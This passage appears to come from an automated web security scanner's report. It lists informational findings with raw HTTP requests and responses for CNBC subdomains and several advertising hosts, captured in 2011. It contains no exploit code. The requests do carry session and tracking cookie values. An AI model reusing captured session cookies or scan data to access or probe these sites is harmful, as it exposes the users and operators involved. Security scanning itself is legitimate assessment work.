Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

29.43. http://pro.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pro.cnbc.com
Path:	/

Request

GET / HTTP/1.1
Host: pro.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 24 Sep 2010 11:40:39 GMT
Accept-Ranges: bytes
ETag: "2665ab4fdd5bcb1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 06 Sep 2011 15:02:07 GMT
Via: 1.1 aicache6
Content-Length: 128
X-Aicache-OS: 216.151.182.3:80
Connection: Keep-Alive
Keep-Alive: max=20

<html>
<head>
   <script type="text/javascript">
   location.href = "index.asp";
   </script>
</head>
<body>

</body>
</html>

29.44. http://pro.cnbc.com/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pro.cnbc.com
Path:	/index.asp

Request

GET /index.asp HTTP/1.1
Host: pro.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA; x_debug_lvl=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Tue, 06 Sep 2011 15:01:09 GMT
Server: Microsoft-IIS/7.0
Date: Tue, 06 Sep 2011 15:02:08 GMT
Via: 1.1 aicache6
Content-Length: 194
X-Aicache-OS: 216.151.182.3:80
Connection: Keep-Alive
Keep-Alive: max=20

<script type="text/javascript">window.top.location='http://login.cnbc.com/tpauth/rest/authenticate?source=subscription&source_type=pro&apphome='+encodeURIComponent(window.top.location);</script>

29.45. https://register.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/

Request

GET / HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.46. https://register.cnbc.com/RandomImage.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/RandomImage.jsp

Request

Response

29.47. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

29.48. https://support.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.oracle.com
Path:	/

Request

Response

29.49. https://support.oracle.com/CSP/ui/xml/sunConnect.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.oracle.com
Path:	/CSP/ui/xml/sunConnect.html

Request

Response

29.50. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Request

Response

29.51. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/728x90/atf

Request

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1147
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:57:38 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...

29.52. http://tf.nexac.com/media/1809966/na.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tf.nexac.com
Path:	/media/1809966/na.html

Request

GET /media/1809966/na.html HTTP/1.1
Host: tf.nexac.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=ignore; na_tc=Y

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
Date: Tue, 06 Sep 2011 14:59:05 GMT
X-Function: 301
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public
Content-Type: text/html
Content-Length: 762
Connection: keep-alive

<script type="text/javascript">

function getNaID() {
var cookieName = "na_id";
var nextacCookie = "" + document.cookie;
var startIndex = nextacCookie.indexOf(cookieName);
if (startIndex != -1)
...[SNIP]...

29.53. http://ticker.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ticker.cnbc.com
Path:	/

Request

GET / HTTP/1.1
Host: ticker.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.54. http://tps31.doubleverify.com/visit.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tps31.doubleverify.com
Path:	/visit.js

Request

GET /visit.js?ctx=1135557&cmp=1135559&advid=1135558&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=6&plc=1398295&sid=interclk&adid=&&num=275&srcurl=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&curl=&qpgid=&referrer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1315339024254%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252F HTTP/1.1
Host: tps31.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:24 GMT
Connection: close
Content-Length: 27

The service is unavailable.

29.55. http://uac.advertising.com/wrapper/aceUACping.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uac.advertising.com
Path:	/wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Tue, 06 Sep 2011 15:42:49 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:16:04 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

29.56. http://videometa.cnbc.com/getadmincontent.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://videometa.cnbc.com
Path:	/getadmincontent.do

Request

GET /getadmincontent.do HTTP/1.1
Host: videometa.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Server: aicache6x
Expires: Tue, 06 Sep 2011 15:06:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:06:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132

<html><title>503 Service temporarily not available</title><body><h1>503 Service not available</h1><hr /><p>aiCache</p></body></html>

29.57. http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/BVK/iview/349019750/direct/01/8665855478

Request

GET /BVK/iview/349019750/direct/01/8665855478?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001069543/cstr=12485207=_4e664067,8665855478,768033^1069543^1184^0,1_/xsxdata=$XSXDATA/bnum=12485207/optn=64?trg= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342006119&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:46:48 GMT
Connection: close
Content-Length: 590

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/225567817/349019750/direct/01" onclick="(new Image).src='http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=00010695
...[SNIP]...

29.58. http://view.atdmt.com/FXM/iview/308880957/direct/01/1049994 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/FXM/iview/308880957/direct/01/1049994

Request

GET /FXM/iview/308880957/direct/01/1049994?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:49:15 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.59. http://view.atdmt.com/FXM/iview/308880957/direct/01/466318 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/FXM/iview/308880957/direct/01/466318

Request

GET /FXM/iview/308880957/direct/01/466318?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:04:29 GMT
Connection: close
Content-Length: 741

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/90077638/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B
...[SNIP]...

29.60. http://view.atdmt.com/FXM/iview/308880957/direct/01/5096911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/FXM/iview/308880957/direct/01/5096911

Request

GET /FXM/iview/308880957/direct/01/5096911?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:02:41 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.61. http://view.atdmt.com/FXM/iview/308880957/direct/01/5912867 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/FXM/iview/308880957/direct/01/5912867

Request

GET /FXM/iview/308880957/direct/01/5912867?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:03:37 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.62. http://view.atdmt.com/FXM/iview/308880957/direct/01/6197540 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/FXM/iview/308880957/direct/01/6197540

Request

GET /FXM/iview/308880957/direct/01/6197540?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:28:57 GMT
Connection: close
Content-Length: 740

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/90077638/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B
...[SNIP]...

29.63. http://view.atdmt.com/FXM/iview/308880957/direct/01/7067761 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/FXM/iview/308880957/direct/01/7067761

Request

GET /FXM/iview/308880957/direct/01/7067761?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 14:56:39 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.64. http://view.atdmt.com/FXM/iview/308880957/direct/01/7533182 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/FXM/iview/308880957/direct/01/7533182

Request

GET /FXM/iview/308880957/direct/01/7533182?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:04:49 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.65. http://view.atdmt.com/FXM/iview/308880957/direct/01/7760164 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/FXM/iview/308880957/direct/01/7760164

Request

GET /FXM/iview/308880957/direct/01/7760164?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:34:06 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.66. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
